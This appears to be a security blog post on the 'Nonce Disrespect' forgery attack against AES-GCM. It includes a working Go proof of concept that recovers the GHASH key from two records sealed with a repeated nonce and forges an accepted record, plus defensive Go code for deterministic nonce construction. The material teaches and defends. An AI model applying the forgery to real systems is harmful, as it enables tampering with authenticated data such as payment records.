This year’s Black Hat Briefings included many outstanding talks; being a bit of a crypto geek, the one that particularly piqued my interest was the practical forgery attack on AES in Galois/Counter Mode (GCM): Nonce Disrespect (slides [pdf], paper [pdf], example code).
GCM is an authenticated encryption mode: it encrypts with AES in counter mode and computes a GHASH authentication tag over the ciphertext and any associated data, all in a single pass over the message. A purpose-built authenticated encryption mode is the safest way to combine confidentiality and integrity; of the hand-rolled compositions, Encrypt-then-Authenticate is the only generically sound order, and Authenticate-then-Encrypt is the most fragile.
The Nonce Disrespect attack exploits nonces that repeat under a single key, whether because an implementation draws them at random and eventually collides or because it reuses them outright. GCM’s counter-mode keystream and the mask applied to the authentication tag both depend only on the key and the nonce, so two records sealed with the same nonce leak the XOR of their plaintexts and, worse, let an attacker solve for the GHASH authentication key H and then forge valid tags for messages of his own choosing (Joux’s “forbidden attack”). The underlying cipher is not broken, so this is not a cryptanalytic attack per se; it is yet another attack that lands on TLS implementations rather than on the protocol design.
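Added example, not code from the original post or from the Nonce Disrespect authors’ example code: the single-block case of that forgery in Go, run against the standard library’s own AES-GCM. Given two 16-byte records sealed under the same key and nonce with no associated data, it solves for the GHASH key H from the two tags alone, reuses the leaked CTR keystream to encrypt a plaintext of the attacker’s choosing, forges a tag for it, and has Go’s GCM accept the result. The key, the nonce and the AMOUNT records are constructed for the demo; the GF(2^128) arithmetic follows SP 800-38D Algorithm 1, and the field inverse and square root are plain repeated squaring.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// gfElem is a GF(2^128) element in GCM bit order: x^0 is the top bit of hi (first byte of the block).
type gfElem struct{ hi, lo uint64 }

func toElem(b []byte) gfElem {
	return gfElem{binary.BigEndian.Uint64(b[:8]), binary.BigEndian.Uint64(b[8:16])}
}

func (a gfElem) bytes() []byte {
	return binary.BigEndian.AppendUint64(binary.BigEndian.AppendUint64(nil, a.hi), a.lo)
}

func (a gfElem) xor(b gfElem) gfElem { return gfElem{a.hi ^ b.hi, a.lo ^ b.lo} }

// gfMul is the block multiplication of NIST SP 800-38D, Algorithm 1.
func gfMul(x, y gfElem) gfElem {
	z, v := gfElem{}, y
	for i := 0; i < 128; i++ {
		if ([2]uint64{x.hi, x.lo})[i/64]>>uint(63-i%64)&1 == 1 { // bit i of x, bit 0 leftmost
			z = z.xor(v)
		}
		red := (v.lo & 1) * 0xe100000000000000 // reduce by x^128+x^7+x^2+x+1 when a bit shifts out
		v.lo, v.hi = v.lo>>1|v.hi<<63, v.hi>>1^red
	}
	return z
}

// gfInv returns a^(2^128-2) = a^-1; gfSqrt returns a^(2^127) = sqrt(a) in characteristic 2.
func gfInv(a gfElem) gfElem {
	r, p := gfElem{hi: 1 << 63}, a // the block 80 00..00 is the multiplicative identity
	for i := 1; i <= 127; i++ {
		p = gfMul(p, p)
		r = gfMul(r, p)
	}
	return r
}

func gfSqrt(a gfElem) gfElem {
	for i := 0; i < 127; i++ {
		a = gfMul(a, a)
	}
	return a
}

var lenBlock = gfElem{0, 128} // GHASH length block: 0 bits of AAD, 128 bits of ciphertext

// recoverGHASHKey takes two one-block ciphertexts and tags made under the same key and
// nonce (no AAD). For one block T = C*H^2 + L*H + E, where E is the encrypted counter block
// masking the tag; XORing the tags cancels L*H and E and leaves (C1+C2)*H^2, giving H then E.
func recoverGHASHKey(c1, t1, c2, t2 []byte) (h, e gfElem) {
	h2 := gfMul(toElem(t1).xor(toElem(t2)), gfInv(toElem(c1).xor(toElem(c2))))
	h = gfSqrt(h2)
	e = toElem(t1).xor(gfMul(toElem(c1), h2)).xor(gfMul(lenBlock, h))
	return h, e
}

// forgeTag returns a valid tag for any new one-block ciphertext under that same nonce.
func forgeTag(h, e gfElem, c []byte) []byte {
	return gfMul(toElem(c), gfMul(h, h)).xor(gfMul(lenBlock, h)).xor(e).bytes()
}

// demo seals two constructed records under one key with a repeated nonce, recovers H from
// the tags alone and forges a third record; returns recovered H, true H, accepted plaintext.
func demo() (recoveredH, trueH, accepted []byte, err error) {
	block, err := aes.NewCipher([]byte("0123456789abcdef")) // constructed demo key
	if err != nil {
		return nil, nil, nil, err
	}
	gcm, _ := cipher.NewGCM(block)  // only errors for a non-128-bit block cipher
	nonce := []byte("reused-nonce") // 96-bit nonce used twice: the bug being exploited
	p1, p2 := []byte("AMOUNT=00000100;"), []byte("AMOUNT=00000250;")
	r1 := gcm.Seal(nil, nonce, p1, nil) // ciphertext || 16-byte tag
	r2 := gcm.Seal(nil, nonce, p2, nil)
	h, e := recoverGHASHKey(r1[:16], r1[16:], r2[:16], r2[16:])
	// The CTR keystream repeats too, so one known plaintext (p1) yields it and the
	// attacker can encrypt anything: C' = P' xor C1 xor P1.
	target, cf := []byte("AMOUNT=99999999;"), make([]byte, 16)
	for i := range cf {
		cf[i] = target[i] ^ r1[i] ^ p1[i]
	}
	accepted, err = gcm.Open(nil, nonce, append(cf, forgeTag(h, e, cf)...), nil)
	trueH = make([]byte, 16)
	block.Encrypt(trueH, trueH) // H = AES_K(0^128), for comparison only
	return h.bytes(), trueH, accepted, err
}

func main() {
	h, th, pt, err := demo()
	fmt.Printf("recovered H %x\ntrue H      %x\nforgery accepted: %v, plaintext %q\n", h, th, err == nil, pt)
}
```

The comparison against AES_K(0^128) at the end of demo is there only to show that the recovery is exact; a real attacker never sees the key and needs nothing beyond the two records. For longer records the same equations hold but recovering H means finding the roots of a higher-degree polynomial over GF(2^128), and with more than two colliding records the candidate roots collapse to the one true H.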
Unfortunately, the standards leave nonce construction largely to the implementer. NIST SP 800-38D recommends a deterministic nonce (a fixed field plus a counter), permits random 96-bit nonces only with a limit on how many messages a key may protect, and says nothing about how to verify either property in a deployed system; RFC 5288 requires that the 8-byte explicit part of a TLS 1.2 GCM nonce never repeat under a key but lets each implementation decide how to generate it. Having dealt with various relevant standards (NIST, IETF, etc.) in a former life, I can understand this frustration. It really does feel like you have to be a bit of a cryptographer yourself if you’re writing code against a crypto API, and even more so if you’re writing a crypto library. Even if you’re pretty good at crypto, you’re still likely to get something wrong along the way; Nonce Disrespect shows how even one of the stronger modes for cryptographically protecting your data can fall to an implementation flaw.
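Added example, not from the original post or from any of the cited standards or code: the deterministic nonce construction SP 800-38D recommends, written in Go around the standard library’s AES-GCM. A 32-bit fixed field identifies the sender and a 64-bit invocation counter supplies the rest; the counter refuses to wrap rather than silently repeating, and the nonce is carried with the record so the receiver never guesses it. The names (Sealer, NewSealer, ErrNonceExhausted), the key and the fixed field are my choices for the demo.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"errors"
	"fmt"
)

// ErrNonceExhausted is returned instead of ever letting the counter wrap around.
var ErrNonceExhausted = errors.New("gcm: nonce counter exhausted, rotate the key")

// Sealer owns one AES-GCM key and builds every nonce by the deterministic construction of
// SP 800-38D section 8.2.1: a 32-bit fixed field naming this sender, then a 64-bit counter.
type Sealer struct {
	aead    cipher.AEAD
	fixed   uint32
	counter uint64
}

func NewSealer(key []byte, fixed uint32) (*Sealer, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return &Sealer{aead: aead, fixed: fixed}, nil
}

// nextNonce hands out each 96-bit nonce exactly once and fails closed when the counter
// would repeat; the state is advanced before the nonce is used, so a retry cannot reuse it.
func (s *Sealer) nextNonce() ([]byte, error) {
	if s.counter == ^uint64(0) {
		return nil, ErrNonceExhausted
	}
	s.counter++
	nonce := make([]byte, 12)
	binary.BigEndian.PutUint32(nonce[:4], s.fixed)
	binary.BigEndian.PutUint64(nonce[4:], s.counter)
	return nonce, nil
}

// Seal returns nonce || ciphertext || tag, so the receiver never has to guess the nonce.
func (s *Sealer) Seal(plaintext, aad []byte) ([]byte, error) {
	nonce, err := s.nextNonce()
	if err != nil {
		return nil, err
	}
	out := make([]byte, 12, 12+len(plaintext)+s.aead.Overhead())
	copy(out, nonce)
	return s.aead.Seal(out, nonce, plaintext, aad), nil
}

// Open is the receiving side for a record produced by Seal under the same key.
func (s *Sealer) Open(record, aad []byte) ([]byte, error) {
	if len(record) < 12+s.aead.Overhead() {
		return nil, errors.New("gcm: record too short")
	}
	return s.aead.Open(nil, record[:12], record[12:], aad)
}

func main() {
	s, err := NewSealer([]byte("0123456789abcdef"), 1) // constructed demo key and sender id
	if err != nil {
		panic(err)
	}
	for _, msg := range []string{"first record", "second record"} {
		rec, _ := s.Seal([]byte(msg), nil)
		fmt.Printf("nonce %x -> %d-byte record\n", rec[:12], len(rec))
	}
}
```

The fixed field is what keeps two senders sharing a key (or one sender after a restart with a persisted counter) from colliding, and the counter state must be persisted or the key rotated across restarts. If a design insists on random 96-bit nonces instead, SP 800-38D caps the number of messages per key at 2^32; the same counter field is the natural place to enforce that cap.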
Given how hard low-level primitives are to get right, most developers should be working at a higher level of abstraction when they use crypto in software. I would really love to see some good consensus in industry and more work towards “a secure network connection”, “a secure storage container”, etc., instead of asking developers to work with lower-level concepts like “ciphered message”, “digital signature”, and “TLS 1.2 connection”.